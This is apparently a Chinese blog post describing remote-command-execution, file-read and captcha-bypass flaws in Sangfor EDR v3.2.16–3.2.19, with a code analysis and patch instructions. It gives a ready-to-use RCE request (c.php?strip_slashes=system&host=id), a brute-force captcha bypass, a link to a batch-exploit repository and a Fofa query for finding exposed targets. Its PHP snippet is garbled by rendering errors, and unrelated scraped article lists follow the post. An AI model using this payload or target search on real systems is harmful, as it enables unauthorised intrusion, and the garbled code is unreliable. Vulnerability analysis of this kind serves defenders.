0x00简介
深信服EDR属于终端安全产品部,是深信服公司在安全业务的战略级投入产品。终端安全部门负责下一代终端安全解决方案的产品研发,基于先进的AI技术和高效的安全领域经验, 建设深信服整体安全解决方案的端点响应能力,与云、网、端产品联动,构建面向未来、有效防御的闭环体系。

0x01利用方法
1.https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id

2.linux读取文件

3.验证码绕过
// 校验验证码

if (!ldb_run_at_console()) {
if (isset($_REQUEST[“captcha”])
|| $_REQUEST[“captcha”] != base64_decode("M…
echo “验证码不对,请输入…”
return;
}
}

先输入几次错误密码,把验证码弄出来后,开启Burp(抓包工具)爆破密码即可,只要验证码第一次输入对后不为空,即可绕过。

  1. 批量利用方法
    在GitHub上已经有大佬放出批量攻击的exp

https://github.com/A2gel/sangfor-edr-exploit

请勿尝试,非法攻击是法的,请误去触犯法律,如作他用所承受的法律责任一概与作者无关

0x02搜索相关漏洞方法
Fofa地址:https://fofa.so/

使用fofa搜索引擎搜索:body=“终端检测响应平台”

0x03漏洞分析
1.RCE漏洞

echo “<p><b>Log Helper</b></p>”;
$show_form($_REQUEST);

跟入show_form

/*
* 显示表单
* @param array $params 请求参数
* @return
*/

$show_form = function(KaTeX parse error: Expected 'EOF', got '&' at position 13: params) use(&̲strip_slashes, &KaTeX parse error: Expected '}', got 'EOF' at end of input: …put) { extract(params);
$host = isset($host)?$strip_slashes($host):“127.0.0.1”;

经典的php变量覆盖漏洞,使用grep搜索一下

tools目录下全部都是变量覆盖漏洞,单纯只防御网上那个poc是没有用的。

2.任意文件下载漏洞

可以看到代码没有任何的过虑

3.验证码绕过

0x03影响范围

受此漏洞影响的版本仅包括EDR

v3.2.16

v3.2.17

v3.2.19

0x04修复方式

目前,深信服已经发布升级版本和补丁,更新至v3.2.21版本或升级补丁即可修复该问题并增强其他安全机制。

1.深信服已通过在线升级方式推送补丁包修复该漏洞,开启在线升级功能可自动修复该漏洞。

2.针对无法在线升级的用户,深信服技术服务人员将主动协助用户完成EDR版本升级或补丁修复工作。同时,用户可通过以下链接下载升级安装包来完成EDR的升级工作:

https://bbs.sangfor.com.cn/plugin.php?id=service:download&action=view&fid=100000022878128#/100000035115623/all/undefined

下载升级安装包后打开EDR管理平台,在系统管理–升级管理–平台和终端升级界面中导入该升级安装包,导入后管理平台和终端将自动升级至v3.2.21版本。

参考文章:
https://www.cnblogs.com/potatsoSec/p/13520546.html
https://mp.weixin.qq.com/s/nAEqjeCm34t1yD5Kh7ZJxA

免责申明:
本项目仅进行信息搜集,漏洞探测工作,无漏洞利用、攻击性行为,发文初衷为仅为方便安全人员对授权项目完成测试工作和学习交流使用。 请使用者遵守当地相关法律,勿用于非授权测试,勿用于非授权测试,勿用于非授权测试~~(重要的事情说三遍)~~,如作他用所承受的法律责任一概与东塔安全学院无关!!!

深信服EDR远程命令执行相关推荐

  1. CNVD-2020-46552 深信服EDR远程代码执行漏洞复现

    目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.漏洞修复 1.漏洞概述 终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件和管理平台软件共同 ...

  2. 深信服行为感知命令执行漏洞

    深信服行为感知命令执行漏洞 1.深信服行为感知漏洞 1.1.漏洞描述 1.2.漏洞影响 1.3.漏洞复现 1.3.1.登录页面 1.3.2.构建漏洞URL 1.3.2.1.查询IP地址 1.3.2.2 ...

  3. zabbix监控深信服_Zabbix 远程代码执行漏洞CVE202011800

    漏洞概要 漏洞名称:Zabbix 远程代码执行漏洞CVE-2020-11800 威胁等级:高危 影响范围: Zabbix 3.2 (已不支持) Zabbix 3.0 - 3.0.30 Zabbix 2 ...

  4. 深信服EDR任意用户登录漏洞复现

    目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.漏洞修复 1.漏洞概述 2020年HW行动时爆出的深信服EDR漏洞除了前面复现的CNVD-2020-46552深信服EDR远程代码执行 ...

  5. 深信服 行为感知系统 c.php 远程命令执行漏洞

    漏洞描述: 深信服 行为感知系统 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行 漏洞利用条件: / 漏洞影响范围: 行为感知系统 漏洞复现: 1.POC:/tool/log ...

  6. 深信服edr终端漏洞

    一.前言 最近这些天来了广州当蓝方,工作之余听到了几个朋友说关于深信服edr爆0day的情况,自己也没时间复现,就简单记录一下. 该XXX简介: 深信服终端检测响应平台EDR,围绕终端资产安全生命周期 ...

  7. 深信服 EDR终端检测响应平台 0day RCE 漏洞

    0x01 前言 昨天睡得正香,突然公司售前就呼来电话,问某某edr出现啥问题了,然后我就给他讲了一遍,这个月太忙了,没时间写博客,今天继续来水一篇. 其次大哥来波最真挚的简介: 深信服终端检测响应平台 ...

  8. 深信服EDR终端响应平台

    深信服EDR终端响应平台 一.EDR介绍:终端检测响应平台 1.终端安全由传统防病毒向EPP+EDR融合演进 EPP解决已知威胁,EDR解决未知威胁 EPP融合EDR构建下一代终端安全 2.四阶段模型 ...

  9. ssh升级后+sftp+java_java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行(改进)...

    我写过一篇java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行,现在想来,觉得调用方式太过于绕,不符合我写程序的风格,所以进行了改进. 参数类,用于配置连接的参数,SshConfigur ...

最新文章

  1. Wedge 100-32X 100GbE Data Center Switch
  2. JAVA自动补全插件
  3. Visual Studio 2017 Android 调试无法连接到虚拟机
  4. tensorflow下载
  5. SharePoint 2010 Crawl Component Stuck in “Recovering” status
  6. 电商视觉:焦点图的万能构图模板
  7. php hook 键盘,Windows C++ 键盘钩子
  8. 从一列数中筛除尽可能少的数使得从左往右看,这些数是从小到大再从大到小的(网易)。...
  9. sql查询前50条_您必须知道的前50条SQL查询
  10. latex 左对齐_LaTeX从入门到提高(3)
  11. Linux radius客户端,FreeRadius客户端基础配置及测试
  12. 【zigbee无线通信模块步步详解】ZigBee3.0模块建立远程网络控制方法
  13. python 实现抖音视频无水印解析
  14. 关于流程图的场景提炼,这一次终于说清楚业务流程图、功能流程图、页面流程图了
  15. Infor和C3 AI建立战略合作伙伴关系,提供可扩展的企业AI行业应用
  16. 自写sort排序函数(支持重载排序规则)
  17. 基于AD7705的32路信号采集软件设计
  18. 电脑出现错误信息的故障排除
  19. 扫地阿姨看完都学会了!java全栈是什么意思
  20. 两相四线步进电机的驱动方法/驱动芯片用法

热门文章

  1. 猜数字游戏的简单写法
  2. 前缀 中缀 后缀表达式2
  3. 【Unity】 HTFramework框架(四十三)标准化命名
  4. python循环从0到x_Python3 从零单排0_变量格式化输出流程控制循环
  5. PMP报考条件及考试时间。
  6. 成为优秀的量化交易者,你需要这五种能力
  7. 农村小学计算机教育论文,小学计算机的教育论文
  8. css实现div盒子内显示两行或三行,超出部分用省略号显示
  9. 课工场与河南质量工程职业学院就“物联网” 校企合作项目展开深入交流
  10. 第四届立创电子设计大赛开幕!